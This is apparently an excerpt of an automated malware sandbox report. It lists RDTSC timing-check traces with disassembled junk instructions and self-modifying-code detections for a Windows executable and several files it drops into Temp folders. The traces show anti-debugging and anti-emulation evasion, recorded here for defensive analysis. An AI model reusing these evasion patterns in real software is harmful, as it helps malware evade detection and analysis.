Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70AEF second address: 4C70AF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70AF5 second address: 4C70B1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F97B4EC49C5h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70B1F second address: 4C70B2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F97B4F2EDCCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70B2F second address: 4C70B33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70B33 second address: 4C70B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F98271E462Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movzx ecx, di 0x00000014 mov bx, 4C88h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70B4C second address: 4C70B5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F97B4EC49BDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70B5D second address: 4C70B82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [76FB6968h], 00000002h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push edi 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70B82 second address: 4C70B87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70B87 second address: 4C70B8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70B8D second address: 4C70B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70B91 second address: 4C70BA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F98271E45E3h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70BA7 second address: 4C70BB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F97B4EC49BDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70BB8 second address: 4C70C02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [ebp+0Ch] 0x0000000e jmp 00007F97B4F2EDCEh 0x00000013 xchg eax, ebx 0x00000014 jmp 00007F97B4F2EDD0h 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F97B4F2EDCEh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70C02 second address: 4C70C91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F97B4EC49C1h 0x00000009 and ecx, 7395A926h 0x0000000f jmp 00007F97B4EC49C1h 0x00000014 popfd 0x00000015 push ecx 0x00000016 pop ebx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebx 0x0000001b jmp 00007F97B4EC49BAh 0x00000020 xchg eax, ebx 0x00000021 jmp 00007F97B4EC49C0h 0x00000026 push eax 0x00000027 pushad 0x00000028 mov ax, di 0x0000002b mov eax, edi 0x0000002d popad 0x0000002e xchg eax, ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 jmp 00007F97B4EC49C0h 0x00000037 pushfd 0x00000038 jmp 00007F97B4EC49C2h 0x0000003d and ax, 9F88h 0x00000042 jmp 00007F97B4EC49BBh 0x00000047 popfd 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70C91 second address: 4C70CCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+14h] 0x0000000c jmp 00007F97B4F2EDCEh 0x00000011 push dword ptr [ebp+10h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov bl, 8Fh 0x00000019 mov bx, cx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70D28 second address: 4C70D4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F97B4EC49BDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70D4D second address: 4C70D69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F97B4F2EDD7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C80D8D second address: 4C80D91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C80D91 second address: 4C80D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C80B53 second address: 4C80BAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F97B4EC49BFh 0x00000009 and ecx, 5C0E5A7Eh 0x0000000f jmp 00007F97B4EC49C9h 0x00000014 popfd 0x00000015 jmp 00007F97B4EC49C0h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F97B4EC49BDh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C80BAB second address: 4C80BB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF0F0E second address: 4CF0F54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F97B4EC49C9h 0x0000000c and cl, 00000006h 0x0000000f jmp 00007F97B4EC49C1h 0x00000014 popfd 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F97B4EC49BDh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF0F54 second address: 4CF0F74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, bl 0x00000005 mov dx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F97B4F2EDD1h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF0474 second address: 4CF0537 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F97B4EC49BEh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F97B4EC49C1h 0x00000017 add esi, 149150D6h 0x0000001d jmp 00007F97B4EC49C1h 0x00000022 popfd 0x00000023 mov eax, 78023C47h 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a jmp 00007F97B4EC49BAh 0x0000002f mov ebp, esp 0x00000031 pushad 0x00000032 movzx esi, dx 0x00000035 mov eax, edi 0x00000037 popad 0x00000038 pop ebp 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007F97B4EC49BEh 0x00000042 xor ecx, 6CB3B158h 0x00000048 jmp 00007F97B4EC49BBh 0x0000004d popfd 0x0000004e pushfd 0x0000004f jmp 00007F97B4EC49C8h 0x00000054 sub ecx, 5A62BBB8h 0x0000005a jmp 00007F97B4EC49BBh 0x0000005f popfd 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF0537 second address: 4CF053D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF053D second address: 4CF0541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF02EE second address: 4CF0365 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F97B4F2EDCFh 0x00000009 and ecx, 4113242Eh 0x0000000f jmp 00007F97B4F2EDD9h 0x00000014 popfd 0x00000015 movzx eax, bx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c jmp 00007F97B4F2EDCAh 0x00000021 xchg eax, ebp 0x00000022 jmp 00007F97B4F2EDD0h 0x00000027 mov ebp, esp 0x00000029 pushad 0x0000002a call 00007F97B4F2EDCEh 0x0000002f pushad 0x00000030 popad 0x00000031 pop eax 0x00000032 mov edi, 501278B4h 0x00000037 popad 0x00000038 pop ebp 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c movzx eax, dx 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF0365 second address: 4CF036B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C9016E second address: 4C901B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F97B4F2EDCAh 0x00000013 jmp 00007F97B4F2EDD5h 0x00000018 popfd 0x00000019 jmp 00007F97B4F2EDD0h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C901B9 second address: 4C901DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ecx, 4CA7900Bh 0x00000010 movzx eax, di 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C901DB second address: 4C901E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C901E1 second address: 4C901EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F97B4EC49BAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C901EF second address: 4C901F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C901F3 second address: 4C90202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C90202 second address: 4C9021A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C9021A second address: 4C90220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C90220 second address: 4C90224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF0712 second address: 4CF0716 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF0716 second address: 4CF071C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF071C second address: 4CF0754 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F97B4EC49C0h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F97B4EC49BEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF0754 second address: 4CF075A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF075A second address: 4CF075E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF075E second address: 4CF0762 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF0762 second address: 4CF0806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F97B4EC49BFh 0x00000010 sub esi, 3001680Eh 0x00000016 jmp 00007F97B4EC49C9h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F97B4EC49C0h 0x00000022 add cx, C688h 0x00000027 jmp 00007F97B4EC49BBh 0x0000002c popfd 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 jmp 00007F97B4EC49C6h 0x00000035 push dword ptr [ebp+0Ch] 0x00000038 jmp 00007F97B4EC49C0h 0x0000003d push dword ptr [ebp+08h] 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F97B4EC49C7h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF0806 second address: 4CF0834 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ABE39F41h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F97B4F2EDCAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF0834 second address: 4CF083A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D915E second address: 9D918A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F97B4F2EDD4h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA073E second address: 4CA0743 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA0743 second address: 4CA0772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F97B4F2EDD4h 0x0000000f mov dword ptr [esp], ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F97B4F2EDCAh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA0772 second address: 4CA0776 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA0776 second address: 4CA077C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA077C second address: 4CA0782 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA0782 second address: 4CA0786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA0786 second address: 4CA08A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F97B4EC49C0h 0x00000012 push FFFFFFFEh 0x00000014 pushad 0x00000015 mov ecx, 289E384Dh 0x0000001a mov ecx, 6EA30C49h 0x0000001f popad 0x00000020 call 00007F97B4EC49B9h 0x00000025 pushad 0x00000026 call 00007F97B4EC49C2h 0x0000002b mov bl, al 0x0000002d pop ebx 0x0000002e call 00007F97B4EC49BCh 0x00000033 pushfd 0x00000034 jmp 00007F97B4EC49C2h 0x00000039 add ax, 08F8h 0x0000003e jmp 00007F97B4EC49BBh 0x00000043 popfd 0x00000044 pop eax 0x00000045 popad 0x00000046 push eax 0x00000047 pushad 0x00000048 jmp 00007F97B4EC49C4h 0x0000004d pushfd 0x0000004e jmp 00007F97B4EC49C2h 0x00000053 adc cl, FFFFFF88h 0x00000056 jmp 00007F97B4EC49BBh 0x0000005b popfd 0x0000005c popad 0x0000005d mov eax, dword ptr [esp+04h] 0x00000061 pushad 0x00000062 pushfd 0x00000063 jmp 00007F97B4EC49BFh 0x00000068 and ch, FFFFFFCEh 0x0000006b jmp 00007F97B4EC49C9h 0x00000070 popfd 0x00000071 jmp 00007F97B4EC49C0h 0x00000076 popad 0x00000077 mov eax, dword ptr [eax] 0x00000079 push eax 0x0000007a push edx 0x0000007b jmp 00007F97B4EC49BEh 0x00000080 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA08A3 second address: 4CA08D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007F97B4F2EDD9h 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA08D6 second address: 4CA08DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA08DC second address: 4CA091C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F97B4F2EDD0h 0x00000009 and ah, 00000038h 0x0000000c jmp 00007F97B4F2EDCBh 0x00000011 popfd 0x00000012 push ecx 0x00000013 pop ebx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push 56DC22FBh 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f call 00007F97B4F2EDCCh 0x00000024 pop eax 0x00000025 mov bh, 9Dh 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA091C second address: 4CA096D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F97B4EC49C3h 0x00000008 movzx ecx, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e add dword ptr [esp], 20148B05h 0x00000015 jmp 00007F97B4EC49BBh 0x0000001a mov eax, dword ptr fs:[00000000h] 0x00000020 jmp 00007F97B4EC49C6h 0x00000025 nop 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA096D second address: 4CA0971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Special instruction interceptor: First address: 82E854 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Special instruction interceptor: First address: 82E8C5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Special instruction interceptor: First address: 9F4C2D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Special instruction interceptor: First address: 9DF63F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Special instruction interceptor: First address: A509B6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: ABE854 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: ABE8C5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: C84C2D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: C6F63F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: CE09B6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Special instruction interceptor: First address: B93E26 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Special instruction interceptor: First address: D3CD86 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Special instruction interceptor: First address: D3B792 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Special instruction interceptor: First address: B9153E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Special instruction interceptor: First address: B93D27 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Special instruction interceptor: First address: DC8650 instructions caused by: Self-modifying code
Source: C:\Users\user\1000350002\6a8d4317d4.exe Special instruction interceptor: First address: F8191C instructions caused by: Self-modifying code
Source: C:\Users\user\1000350002\6a8d4317d4.exe Special instruction interceptor: First address: F817F8 instructions caused by: Self-modifying code
Source: C:\Users\user\1000350002\6a8d4317d4.exe Special instruction interceptor: First address: 115EF50 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Special instruction interceptor: First address: 4B9DC6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Special instruction interceptor: First address: 4B8D77 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Special instruction interceptor: First address: 4E2789 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Special instruction interceptor: First address: 31DA80 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Special instruction interceptor: First address: 55239C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 463E26 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 60CD86 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 60B792 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 46153E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 463D27 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 698650 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Special instruction interceptor: First address: 2D191C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Special instruction interceptor: First address: 2D17F8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Special instruction interceptor: First address: 4AEF50 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Special instruction interceptor: First address: 1BE854 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Special instruction interceptor: First address: 1BE8C5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Special instruction interceptor: First address: 384C2D instructions caused by: Self-modifying code
